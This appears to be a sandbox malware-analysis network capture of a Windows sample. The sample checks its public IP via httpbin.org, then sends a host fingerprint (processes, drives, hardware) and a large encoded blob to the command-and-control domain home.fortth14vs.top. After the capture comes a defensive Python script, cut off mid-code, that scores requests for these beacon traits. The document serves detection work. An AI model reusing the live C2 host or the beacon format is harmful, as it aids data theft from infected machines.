                                  Dec 31, 2024 09:51:02.176212072 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176285028 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176294088 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176304102 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176314116 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176322937 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176364899 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176376104 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176383972 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176388025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356820107 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356867075 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356987000 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.362962961 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.368421078 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.976355076 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.981169939 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.981251001 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.981556892 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.986330032 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.753937960 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.754304886 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.754369974 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:05.754492998 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:05.759243965 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:06.602132082 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.606991053 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:06.607110023 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.607353926 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.612076044 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422214031 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422230959 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422489882 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:07.422844887 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:07.427649021 CET804970791.149.241.220192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 09:50:58.631081104 CET | 63981 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:50:58.631151915 CET | 63981 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:50:58.638130903 CET | 53 | 63981 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:50:58.638448954 CET | 53 | 63981 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:01.001661062 CET | 63984 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:01.001728058 CET | 63984 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:01.615592003 CET | 53 | 63984 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:01.638082981 CET | 53 | 63984 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:04.726434946 CET | 63986 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:04.726515055 CET | 63986 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:04.819971085 CET | 53 | 63986 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:04.975156069 CET | 53 | 63986 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:05.812803984 CET | 63988 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:05.812865019 CET | 63988 | 53 | 192.168.2.8 | 1.1.1.1
Dec 31, 2024 09:51:06.426683903 CET | 53 | 63988 | 1.1.1.1 | 192.168.2.8
Dec 31, 2024 09:51:06.601092100 CET | 53 | 63988 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 09:50:58.631081104 CET | 192.168.2.8 | 1.1.1.1 | 0xc884 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:50:58.631151915 CET | 192.168.2.8 | 1.1.1.1 | 0x9713 | Standard query (0) | httpbin.org | 28 (AAAA) | IN (0x0001) | false
Dec 31, 2024 09:51:01.001661062 CET | 192.168.2.8 | 1.1.1.1 | 0xb7c3 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:01.001728058 CET | 192.168.2.8 | 1.1.1.1 | 0xb288 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
Dec 31, 2024 09:51:04.726434946 CET | 192.168.2.8 | 1.1.1.1 | 0x746c | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:04.726515055 CET | 192.168.2.8 | 1.1.1.1 | 0xb9c9 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
Dec 31, 2024 09:51:05.812803984 CET | 192.168.2.8 | 1.1.1.1 | 0xc5cd | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:05.812865019 CET | 192.168.2.8 | 1.1.1.1 | 0x4606 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 09:50:58.638448954 CET | 1.1.1.1 | 192.168.2.8 | 0xc884 | No error (0) | httpbin.org |  | 34.200.57.114 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:50:58.638448954 CET | 1.1.1.1 | 192.168.2.8 | 0xc884 | No error (0) | httpbin.org |  | 34.197.122.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:01.615592003 CET | 1.1.1.1 | 192.168.2.8 | 0xb7c3 | No error (0) | home.fortth14vs.top |  | 91.149.241.220 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:04.975156069 CET | 1.1.1.1 | 192.168.2.8 | 0x746c | No error (0) | home.fortth14vs.top |  | 91.149.241.220 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:51:06.601092100 CET | 1.1.1.1 | 192.168.2.8 | 0xc5cd | No error (0) | home.fortth14vs.top |  | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                  • httpbin.org
                                  • home.fortth14vs.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 91.149.241.220 | 80 | 5572 | C:\Users\user\Desktop\r8nllkNEQX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 09:51:01.712446928 CET | 12360 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 442823
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 35 31 34 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808643514482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 09:51:01.717389107 CET | 2472 | OUT | Data Raw: 69 68 55 57 31 36 64 61 6a 4b 64 4f 61 76 70 65 4d 6d 66 6b 32 4e 77 4f 4f 79 33 45 31 4d 48 6d 4f 44 78 57 41 78 6c 46 70 56 73 4c 6a 63 50 57 77 75 4a 70 4e 71 36 56 53 68 58 68 54 71 77 62 54 75 6c 4b 4b 64 74 52 72 5c 2f 41 48 54 2b 48 38 78
                                  Data Ascii: ihUW16dajKdOavpeMmfk2NwOOy3E1MHmODxWAxlFpVsLjcPWwuJpNq6VShXhTqwbTulKKdtRr\/AHT+H8xUNWtrMM8\/U\/8A1zUb\/dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfrHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt5U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1I
Dec 31, 2024 09:51:01.717407942 CET | 2472 | OUT | Data Raw: 38 67 36 43 48 4a 39 5c 2f 77 44 76 7a 5c 2f 38 41 58 71 47 54 5c 2f 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 48 70 2b 4f 4d 30 7a 79 2b 6e 7a 37 50 38 41 4a 37 44 46 42 58 5c 2f 4c 6e 5c 2f 74 30 71 53 4e 35 6d 5c 2f 35 77 5c 2f 77 43 39 5c
                                  Data Ascii: 8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+nz7P8AJ7DFBX\/Ln\/t0qSN5m\/5w\/wC9\/wCWQNR7nZdmf8\/X\/P50\/wDv\/J8mevm+vf8An\/Omf3H2Z\/e+b36f4f4UHXDb5\/oiHy9u\/wCR9vm\/8tB+H160z5\/lf\/XOf9b\/AJ\/z2qXnO\/8Aef55+1f1\/wDr02SM\/J8+HH+fzqJ7fP8ARm9Pr
Dec 31, 2024 09:51:01.717442036 CET | 4944 | OUT | Data Raw: 6f 37 5c 2f 41 50 62 54 38 4b 41 49 46 6a 50 38 42 4f 38 52 6b 2b 5a 4a 5c 2f 77 43 32 6c 70 5c 2f 54 38 73 63 30 63 66 38 41 54 50 38 41 36 61 5c 2f 38 38 50 38 41 72 36 75 5c 2f 77 36 66 7a 78 55 30 63 63 6a 4e 74 5c 2f 64 73 38 66 70 6e 6f 4b
                                  Data Ascii: o7\/APbT8KAIFjP8BO8Rk+ZJ\/wC2lp\/T8sc0cf8ATP8A6a\/88P8Ar6u\/w6fzxU0ccjNt\/ds8fpnoKhj+aT+\/5faT15\/p71n7Pz\/D\/gmlPr8v1GfPHGkaPGP3tz+8\/wCe34+vr9MUZ\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8\/tH17e3\/wBc1maH7kP94\/h\/IU2nv1\/D+pp
Dec 31, 2024 09:51:01.717459917 CET | 2472 | OUT | Data Raw: 76 58 36 5a 37 65 76 74 56 57 53 50 35 66 39 5a 39 65 63 5c 2f 77 43 66 38 69 67 30 70 39 66 6c 2b 6f 65 5a 5c 2f 77 44 62 65 33 55 5c 2f 6a 5c 2f 4c 70 2b 4e 51 79 4e 35 6e 58 50 2b 73 5c 2f 7a 36 2b 39 44 64 46 5c 2f 36 35 66 30 46 4d 2b 64 76
                                  Data Ascii: vX6Z7evtVWSP5f9Z9ec\/wCf8ig0p9fl+oeZ\/wDbe3U\/j\/Lp+NQyN5nXP+s\/z6+9DdF\/65f0FM+dvb9P\/r0Ggsm7O7Zs\/wC2WP8APrVXD43fxfTvjr69fbPepZO3+s7\/ANKbIr8p15\/1n+f06\/zoOvnfl\/XzK\/Od+z\/tnj9x\/wDq\/wA5zUHyfP8A6zv9P8\/0x2zVzyc\/6whv5fpVaSP72\/7\/AB6f5+uK
Dec 31, 2024 09:51:01.717475891 CET | 2472 | OUT | Data Raw: 5c 2f 58 48 66 72 53 37 76 33 62 68 50 4d 33 78 78 66 77 52 66 58 5c 2f 50 38 41 58 6d 6e 52 5c 2f 77 42 7a 66 47 6e 6d 52 66 36 7a 5c 2f 6c 68 44 33 5c 2f 7a 5c 2f 41 44 46 4d 38 7a 39 35 76 33 79 66 6e 33 5c 2f 6e 31 37 56 52 30 45 4d 6b 66 6c
                                  Data Ascii: \/XHfrS7v3bhPM3xxfwRfX\/P8AXmnR\/wBzfGnmRf6z\/lhD3\/z\/ADFM8z95v3yfn3\/n17VR0EMkflbHTKJ\/6Jx9fT6cUPIjfOiRI8f7r\/W\/uJv6fXmn7vmjdF\/5ZXHHlH\/DNM2v8nl\/88vN\/wCeE\/5\/\/X6UAM8vzJEf7\/73\/j4jPr0uvz\/p0pnzwxwf6zZ\/pHleX\/19fj9t\/wA57VJJsjkm+SNE8rn
Dec 31, 2024 09:51:01.717569113 CET | 4944 | OUT | Data Raw: 38 50 38 41 38 74 43 78 6b 5c 2f 69 77 50 61 50 43 66 67 50 53 50 67 74 2b 7a 76 34 4d 2b 46 66 39 74 4a 72 4f 6d 66 43 54 77 33 38 4c 50 41 59 31 5c 2f 55 37 65 44 54 6a 65 70 34 50 74 5c 2f 42 75 6c 32 65 72 58 64 75 30 30 39 74 59 33 46 77 6c
                                  Data Ascii: 8P8A8tCxk\/iwPaPCfgPSPgt+zv4M+Ff9tJrOmfCTw38LPAY1\/U7eDTjep4Pt\/Bul2erXdu009tY3FwlrbX5jS4lS2mkURzM0YauX\/a\/vrS\/\/AGO\/2ip7O5huoR8JvFSma3kWaIlvDkUw2yoWjcGKWN9yMy4Yc5BA\/ojIMxoy40yPA5ZTrywOJ8V8Pmf16rzxljMuecU45PGdCVClLD+zhWr4ipKT\/wBoljcPF0qLw
Dec 31, 2024 09:51:01.717598915 CET | 2472 | OUT | Data Raw: 75 73 6e 38 66 2b 78 4a 2b 58 61 6e 74 73 65 4f 62 66 35 69 65 5a 5c 2f 77 42 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 38 41 65 65 71 50 5c 2f 77 41 73 6f 35 49 73 66 35 5c 2f 48 33 6f 41 70 79 66 33 6b 2b 76 6c 66 6d 63 66 79 36 66 6c 33 71 54 7a 45
                                  Data Ascii: usn8f+xJ+XantseObf5ieZ\/wBsMf5\/+vkU+P8AeeqP\/wAso5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf97n\/AF3HX\/RMZ\/zx6U7dtkTZNG6fn\/jn+mKhWQx+czpJ+8\/59\/8An3Hf\/wDV2rT2nl+P\/AAbJjy9++R383\/VyS\/uOnP\/ANcev6ofL8z+\/wD9sv8AU8f5\/M09f9yT38z9x\/ng+3NHyyN
Dec 31, 2024 09:51:01.717612028 CET | 2472 | OUT | Data Raw: 2b 73 61 58 34 73 6c 2b 46 43 61 66 34 69 38 46 5c 2f 59 66 6a 44 38 4c 74 59 2b 4d 76 68 72 78 46 4c 72 47 75 78 2b 46 39 4d 2b 48 76 68 50 55 50 69 50 59 65 50 39 66 38 53 61 6e 50 34 53 67 76 62 53 33 2b 48 58 5c 2f 43 70 76 48 74 33 34 77 66
                                  Data Ascii: +saX4sl+FCaf4i8F\/YfjD8LtY+MvhrxFLrGux+F9M+HvhPUPiPYeP9f8SanP4SgvbS3+HX\/CpvHt34wfSNK1yK0stBuJtMl1YvCkn5Xg\/G\/wjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlktOWb0W0vrGWuGNw\/tcPVpVJ\/tGM+jn445fFzxXhpxLCCr5fhnOnQw2Iiq+Z5m8lwdK+GxVZOpUzeM8snFO+HxtOr
Dec 31, 2024 09:51:01.722313881 CET | 2472 | OUT | Data Raw: 39 34 38 49 6b 74 56 30 65 31 38 4b 2b 4a 50 43 64 79 2b 73 4e 71 4f 6f 33 75 6d 61 5a 2b 4f 2b 4a 47 66 65 41 66 69 70 77 74 52 79 5c 2f 69 76 6a 44 42 59 76 49 38 76 34 74 6f 55 61 4d 38 70 78 2b 4c 70 59 6a 5c 2f 57 62 44 77 78 32 54 30 73 48
                                  Data Ascii: 948IktV0e18K+JPCdy+sNqOo3umaZ+O+JGfeAfipwtRy\/ivjDBYvI8v4toUaM8px+LpYj\/WbDwx2T0sHTWEw9bEYmUpZhicHGFOjVo1cVUp0qc5V1CJ\/QXhRwz9J\/wS40zHM+DfD7Msu4kr8GYt5nTz3K8FVwuF4VrZlkuMxWLxksdicPhcvdHGYbKqlWWJxFDEYehPnq044epOZ++X\/D9c\/9Gsj\/AMPh\/wDigo\/4f
Dec 31, 2024 09:51:01.722337008 CET | 2472 | OUT | Data Raw: 66 77 34 71 48 38 39 2b 66 38 2b 32 4d 66 35 78 55 38 76 66 5c 2f 41 48 66 38 61 67 37 5c 2f 41 4e 5c 2f 38 2b 50 35 69 73 54 6f 42 2b 76 34 66 31 4e 56 33 36 5c 2f 68 55 74 51 53 66 39 38 66 35 5c 2f 77 41 2b 5c 2f 76 51 64 42 58 59 50 5c 2f 63
                                  Data Ascii: fw4qH89+f8+2Mf5xU8vf\/AHf8ag7\/AN\/8+P5isToB+v4f1NV36\/hUtQSf98f5\/wA+\/vQdBXYP\/c+T\/pnn19vw\/wA5pjZ7+o6f6\/p296sJ90fj\/M1FJH\/f\/wC2v+evc\/5AoNPrP9W\/+1Gbj\/vnv\/8AXx+lVpI\/m+5vfzf+ev6d\/wDHp2qz93Zv+fj\/AFkf+o\/yPzpm35n\/AI0\/z+f59\/fkOmG3z\
Dec 31, 2024 09:51:04.356820107 CET | 157 | IN | HTTP/1.1 200 OK
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:04 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1
                                  Connection: close
                                  Data Raw: 30
                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 91.149.241.220 | 80 | 5572 | C:\Users\user\Desktop\r8nllkNEQX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 09:51:04.981556892 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
Dec 31, 2024 09:51:05.753937960 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:05 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 91.149.241.220 | 80 | 5572 | C:\Users\user\Desktop\r8nllkNEQX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 09:51:06.607353926 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                  Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 09:51:07.422214031 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:07 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 34.200.57.114 | 443 | 5572 | C:\Users\user\Desktop\r8nllkNEQX.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:50:59 UTC | 52 | OUT | GET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
2024-12-31 08:50:59 UTC | 224 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 31 Dec 2024 08:50:59 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
2024-12-31 08:50:59 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                  Data Ascii: { "origin": "8.46.123.189"}
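Read together, the httpbin.org lookup and the three sessions to home.fortth14vs.top are one check-in sequence: the sample first learns its public address from httpbin.org (/ip), then POSTs a JSON host profile to an opaque path (that address, a counter in "current_time", CPU and RAM counts, drive sizes, display count and resolution, a recent-files count and the full process list), followed by several hundred kilobytes that look like a JSON-escaped base64 string (the repeated `\/` escapes). The server answers with a single "0"; the sample then polls the same path with ?argument=0 and posts { "id1": "0", "data": "Done1" }, both of which get a 404 whose body is the default Werkzeug (Flask) "Not Found" page served through nginx. None of the requests carries a User-Agent header. The last ten digits of the path, 1735537738, read as a Unix epoch for 2024-12-30T05:48:58Z, the day before this analysis; that they are an epoch is an inference, not something the report states. The Python below is an added example, not code from the report or from the sample: it parses raw requests of this shape, scores each against those traits, and correlates the echoed egress IP with the one posted in the check-in. The request records are constructed from the request lines and headers above, with the profile body cut down to its top-level keys and the egress address replaced by the RFC 5737 address 203.0.113.10; the two-reason threshold, the ten-digit path pattern and the echo-host list are the example's own assumptions.

```python
"""Score captured HTTP requests for the check-in traits seen in the capture.

Added example, not code from the report or from the sample. Request records
are constructed from the request lines and headers in the capture (bodies
shortened, egress IP replaced by 203.0.113.10). Thresholds, the epoch-suffix
pattern and the echo-host list are the author's assumptions.
"""
import json
import re
from datetime import datetime, timezone

# Top-level keys of the JSON host profile in the first POST body.
FINGERPRINT_KEYS = {
    "ip", "current_time", "Num_processor", "Num_ram", "drivers",
    "Num_displays", "resolution_x", "resolution_y", "recent_files", "processes",
}
# Opaque alphabetic token ending in ten digits, optional query string (assumption).
EPOCH_PATH = re.compile(r"^/[A-Za-z]+(\d{10})(?:\?.*)?$")
# Public "what is my IP" services; only the one seen in this capture is listed.
IP_ECHO_HOSTS = {"httpbin.org"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def path_epoch(path: str):
    """UTC datetime encoded by the ten-digit path suffix, or None if absent."""
    match = EPOCH_PATH.match(path)
    return datetime.fromtimestamp(int(match.group(1)), tz=timezone.utc) if match else None


def fingerprint_keys(body: str) -> int:
    """Number of host-profile keys present in a JSON object body (0 if not JSON)."""
    try:
        obj = json.loads(body)
    except ValueError:
        return 0
    return len(FINGERPRINT_KEYS.intersection(obj)) if isinstance(obj, dict) else 0


def assess(raw: str) -> dict:
    """Collect reasons for one request; two or more mark it suspicious."""
    req = parse_request(raw)
    hdr = req["headers"]
    reasons = []
    if "user-agent" not in hdr:
        reasons.append("no User-Agent header")
    if hdr.get("host", "") in IP_ECHO_HOSTS:
        reasons.append("egress-IP lookup service")
    if req["method"] == "POST" and hdr.get("content-type", "").startswith("application/json"):
        hits = fingerprint_keys(req["body"])
        if hits >= 4:
            reasons.append(f"{hits} host-fingerprint keys in JSON body")
    epoch = path_epoch(req["path"])
    if epoch is not None:
        reasons.append(f"epoch suffix in path = {epoch:%Y-%m-%dT%H:%M:%SZ}")
    return {"host": hdr.get("host"), "method": req["method"], "path": req["path"],
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def egress_ip_reused(echo_response_body: str, beacon_body: str) -> bool:
    """True when the IP returned by the echo service is posted back in the check-in."""
    try:
        origin = json.loads(echo_response_body).get("origin")
        posted = json.loads(beacon_body).get("ip")
    except (ValueError, AttributeError):
        return False
    return origin is not None and origin == posted


def build_request(method, path, host, body="", extra=()):
    """Assemble a raw request in the shape of the capture (no User-Agent by default)."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Accept: */*", *extra]
    if body:
        lines += ["Content-Type: application/json", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed sample data modelled on the capture; not the real bodies.
C2_HOST, C2_PATH = "home.fortth14vs.top", "/gduZhxVRrNSTmMahdBGb1735537738"
PROFILE_BODY = json.dumps({
    "ip": "203.0.113.10", "current_time": "8528974808643514482",
    "Num_processor": 4, "Num_ram": 7,
    "drivers": [{"name": "C:\\", "all": 223.0, "free": 168.0}],
    "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26,
    "processes": [{"name": "[System Process]", "pid": 0}, {"name": "System", "pid": 4}],
})
ECHO_RESPONSE_BODY = json.dumps({"origin": "203.0.113.10"})
SAMPLE_REQUESTS = {
    "ip_lookup": build_request("GET", "/ip", "httpbin.org"),
    "checkin": build_request("POST", C2_PATH, C2_HOST, PROFILE_BODY),
    "task_poll": build_request("GET", C2_PATH + "?argument=0", C2_HOST),
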